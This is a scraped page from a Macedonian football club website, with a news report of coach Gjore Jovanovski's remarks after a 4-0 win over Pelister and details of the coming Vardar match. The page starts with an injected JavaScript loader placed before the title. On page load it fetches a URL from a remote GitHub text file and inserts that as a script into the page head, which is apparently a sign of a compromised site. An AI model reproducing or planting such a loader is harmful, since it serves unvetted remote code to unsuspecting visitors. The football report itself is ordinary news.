;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Ѓоре Јовановски: Го заборавивме Пелистер, сега Вардар ни е во мислите
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Ѓоре Јовановски: Го заборавивме Пелистер, сега Вардар ни е во мислите

Работнички оствари убедлив триумф (4-0) над Пелистер во 29.коло од Првата фудбалска лига, но нема многу време за одмор, анализи и пофалби, затоа што првенството продолжува во забрзан ритам. Веќе в среда, нашиот тим го очекува дерби дуел против Вардар на арената „Филип Втори“.

Тренерот Ѓоре Јовановски е задоволен од изданието против Пелистер, но вели дека тимот е веќе фокусиран на следниот натпревар против Вардар.

„Сакам да упатам честитки до фудбалерите на двете екипи за залагањето, затоа што навистина не е лесно да се игра натпревар на околу 35 степени Целзиусови во април. Задоволни сме од триумфот, мислам дека е потполно заслужен според прикажаната игра, но веќе сме фокусирани на следниот натпревар против Вардар. Ваков ритам е исцрпувачки, но мислам дека е многу добра работа и за фудбалерите, но и за нас тренерите во Македонија, бидејќи мораме да се вклопиме во европскиот стил на фудбалско функционирање. Што се однесува до Вардар, не треба да трошиме зборови за големината на ривалот, иако можеби во моментот и не се во најдобра форма. Но, на дуелите меѓу Вардар и Работнички тоа никогаш не било пресудно, туку желбата, мотивацијата и моменталната инспирација“, вели шефот на стручниот штаб, Ѓоре Јовановски.

Натпреварот меѓу Вардар и Работнички ќе се одигра в среда, со почеток во 15 часот, на арената „Филип Втори“, и ќе биде директно пренесуван на Телевизија 24. Главен судија на мечот ќе биде Димитар Мечкаровски (Скопје), а ќе му помагаат Дејан Неделкоски и Гоце Петрески. Четврти судија ќе биде Никола Караколев (Штип).

За делегат на натпреварот е одреден Антонио Насевски (Кратово), а контролор на судењето ќе биде Петре Илиоски (Прилеп).